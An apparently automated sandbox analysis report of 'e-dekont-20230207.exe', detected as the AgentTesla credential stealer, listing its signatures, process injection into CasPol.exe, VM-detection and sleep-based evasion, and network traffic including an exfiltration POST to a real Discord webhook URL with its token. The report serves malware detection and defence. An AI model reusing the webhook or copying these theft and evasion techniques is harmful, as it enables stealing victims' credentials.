
Windows Analysis Report
e-dekont-20230207.exe

Overview

General Information

Sample Name: e-dekont-20230207.exe
Analysis ID: 800710
MD5: 2fbaa4d917cce04617f24f87309286d6
SHA1: 7480ce7aebd7f59da7d6bd4f9eb7bba0efe05f97
SHA256: 91eb17a8906ebbe9c50ef6a509e80133fd3322aec9b84e04cc5925992235c17e
Tags: exegeoTUR

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • e-dekont-20230207.exe (PID: 6072 cmdline: C:\Users\user\Desktop\e-dekont-20230207.exe MD5: 2FBAA4D917CCE04617F24F87309286D6)
    • CasPol.exe (PID: 6100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author):
Source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: Process Memory Space: CasPol.exe PID: 6100 | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: Process Memory Space: CasPol.exe PID: 6100 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
No Sigma rule has matched

Snort IDS alert:
Timestamp: 02/07/23-18:31:33.991128
Source IP: 192.168.2.5
Destination IP: 162.159.128.233
Source Port: 49690
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: e-dekont-20230207.exe | ReversingLabs: Detection: 25%
Source: e-dekont-20230207.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49689 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49690 version: TLS 1.2
Source: e-dekont-20230207.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: FUCKYOU.pdb source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: MPOIn6t.pdb source: e-dekont-20230207.exe

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49690 -> 162.159.128.233:443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | DNS query: name: api.ipify.org (6 identical entries)
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | IP Address: 162.159.128.233 162.159.128.233
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: discord.com
    Content-Length: 1224
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown | Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 07 Feb 2023 17:31:34 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: close
    set-cookie: __dcfduid=444c6840a70d11ed8760e6ba40672d66; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Egxqsltc4qolLS4uzBaoE9%2FLaswRMsv8abKbQSPxREWUfQSPaTwB7kb7z0WOBsXz71TuPG8StdDXxsdUAHgNvhn4re6poX%2Bxo7O3WpOD0mQMHdrmzCmF8EGKAI5p"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Set-Cookie: __sdcfduid=444c6840a70d11ed8760e6ba40672d66dd69c8ba71cb11fcdcb8dbf0ca98829aacc0c779c3c769b75f558a3581eb9a0f; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
    Set-Cookie: __cfruid=e3626c59acba08201b37fef2fc963ccf5c710641-1675791094; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 795ddc215dd0368a-FRA

    {"message": "Unknown Webhook", "code": 10015}
Source: CasPol.exe, 00000001.00000003.312705815.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.577672379.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.312026803.0000000005BB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com4Dp
Source: unknown | HTTP traffic detected:
    POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: discord.com
    Content-Length: 1224
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49689 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49690 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DAA008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DA9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DAA8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DAC898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_063782BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_063701A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_063729EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06371730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06371760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0637BFF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06373858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_064DCDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_064D1848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_064DA5DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0687E0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0687B0E8
Source: e-dekont-20230207.exe | Static PE information: No import functions for PE file found
Source: e-dekont-20230207.exe, 00000000.00000002.305649698.000000000106C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMPOIn6t.exe0 vs e-dekont-20230207.exe
Source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230207.exe
Source: e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230207.exe
Source: e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230207.exe
Source: e-dekont-20230207.exe, 00000000.00000002.306294096.00000000133F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230207.exe
Source: e-dekont-20230207.exe, 00000000.00000002.305766749.00000000015E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230207.exe
Source: e-dekont-20230207.exe | Binary or memory string: OriginalFilenameMPOIn6t.exe0 vs e-dekont-20230207.exe
Source: e-dekont-20230207.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: e-dekont-20230207.exe | ReversingLabs: Detection: 25%
Source: e-dekont-20230207.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\e-dekont-20230207.exe C:\Users\user\Desktop\e-dekont-20230207.exe
Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 identical entries)
Source: C:\Users\user\Desktop\e-dekont-20230207.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230207.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
Source: e-dekont-20230207.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor' (2 identical entries)
Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor' (2 identical entries)
Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | Cryptographic APIs: 'CreateDecryptor' (2 identical entries)
Source: 1.2.CasPol.exe.400000.0.unpack, a/an2.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.CasPol.exe.400000.0.unpack, a/aN1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 1.2.CasPol.exe.400000.0.unpack, a/aH1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: e-dekont-20230207.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: e-dekont-20230207.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: e-dekont-20230207.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: FUCKYOU.pdb source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: MPOIn6t.pdb source: e-dekont-20230207.exe

Data Obfuscation

Source: e-dekont-20230207.exe, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs | .Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs | .Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs | .Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_04DA0007 push edi; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_064DEC72 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06871E87 push FFFFFF8Bh; iretd
Source: e-dekont-20230207.exe | Static PE information: 0x9521C718 [Wed Apr 14 13:14:00 2049 UTC]
Source: initial sample | Static PE information: section name: .text entropy: 7.972775066304571
Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | High entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | High entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs | High entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
Source: C:\Users\user\Desktop\e-dekont-20230207.exe | Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries)

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\e-dekont-20230207.exe TID: 6092 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2280 | Thread sleep count: 9641 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199563s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1199155s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198980s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198750s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198637s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198515s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198404s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198186s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1198078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197963s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197516s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197405s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197280s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197162s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1197000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196779s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196638s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196422s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196309s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1196093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904 | Thread sleep time: -1195984s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195875s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195765s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195656s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195547s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195432s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195312s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195203s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195078s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194953s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194843s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194734s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194625s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194499s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194391s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194279s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194172s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194062s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1193931s >= -30000s
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1200000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199563
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199281
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1199155
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198980
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198859
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198637
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198515
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 1198404
